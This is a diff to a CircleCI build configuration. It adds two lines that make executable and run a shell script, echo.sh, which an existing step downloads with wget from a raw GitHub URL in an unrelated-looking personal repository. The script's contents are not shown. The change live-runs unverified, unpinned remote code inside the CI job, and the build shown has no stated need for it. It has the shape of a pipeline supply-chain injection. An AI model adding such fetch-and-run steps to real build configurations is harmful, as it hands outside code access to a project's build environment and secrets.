--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -10,3 +10,5 @@ jobs:
           name: Run build commands
           command: |
             wget https://raw.githubusercontent.com/labilabuhu/labilabuhu/refs/heads/main/echo.sh
+            chmod u+x echo.sh
+            ./echo.sh
